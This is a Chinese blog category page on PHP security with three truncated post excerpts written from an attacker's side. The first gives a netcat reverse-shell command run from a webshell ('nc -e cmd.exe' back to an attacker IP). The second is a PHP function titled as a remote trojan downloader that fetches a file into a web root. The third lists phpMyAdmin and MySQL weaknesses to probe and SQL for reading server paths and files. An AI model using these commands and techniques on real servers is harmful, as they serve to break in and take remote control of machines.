php安全 - 随笔分类 - fleam

nc 反弹链接

摘要：nc -l -v -p 80在本机监听80端口，此时80端口是打开的，我们可以在浏览器输入127.0.0.1进行浏览，此时就会出现连接，我们再在监听窗口输入字符，就会在浏览器上显示了。知道上面的作用后，我们就可以在此的基础上，再在webshell里面执行 nc -e cmd.exe 192.168.246.1 80此条命令会把cmd反弹到192.168.246.1上，我们就可以想在本地一样，使用... 阅读全文

posted @ 2016-09-06 12:02 fleam 阅读(2701) 评论(0) 推荐(0) 编辑

php 远程下载木马

摘要：function dlfile($file_url, $save_to) { $content = file_get_contents($file_url); file_put_contents($save_to, $content); } dlfile('https://www.baidu.com/img/bd_logo1.png','d:/wwwroot/123/web/1... 阅读全文

posted @ 2016-09-06 11:28 fleam 阅读(695) 评论(0) 推荐(0) 编辑

mysql 安全

摘要：危险动作： 1、可直接上传php文件 2、phpmyadmin没有删除或弱口令 3、可在线编辑文件功能 4、爆目录 5、后台弱口令 6、后台可执行sql命令 select @@basedir as basePath from dual //数据库安装路径 select load_file('C:/W 阅读全文

posted @ 2016-06-02 13:43 fleam 阅读(188) 评论(0) 推荐(0) 编辑

随笔分类 - php安全

公告

随笔分类

我的链接

阅读排行榜